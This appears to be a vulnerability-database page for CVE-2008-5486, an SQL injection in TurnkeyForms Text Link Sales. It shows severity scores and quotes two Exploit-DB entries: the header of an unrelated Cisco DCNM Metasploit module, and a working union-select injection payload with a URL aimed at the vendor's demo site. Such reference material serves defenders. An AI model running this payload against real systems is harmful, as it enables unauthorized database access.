CVE-2008-5486
published 2008-12-12CVE-2008-5486: SQL injection vulnerability in admin.php in TurnkeyForms Text Link Sales allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.7th percentile
SQL injection vulnerability in admin.php in TurnkeyForms Text Link Sales allows remote attackers to execute arbitrary SQL commands via the id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
exploitdb·2013-12-03
CVE-2013-5486 Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author'
Exploit-DB
TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection
exploitdb·2008-11-14
CVE-2008-5487 TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection
TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection
---
[~] turnkeyforms Text Link Sales Remote Sql inj & xss
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 14.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 43
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http:/
No writeups or analysis indexed.
http://secunia.com/advisories/32732http://securityreason.com/securityalert/4719http://www.securityfocus.com/bid/32308https://exchange.xforce.ibmcloud.com/vulnerabilities/46631https://www.exploit-db.com/exploits/7124http://secunia.com/advisories/32732http://securityreason.com/securityalert/4719http://www.securityfocus.com/bid/32308https://exchange.xforce.ibmcloud.com/vulnerabilities/46631https://www.exploit-db.com/exploits/7124
2008-12-12
Published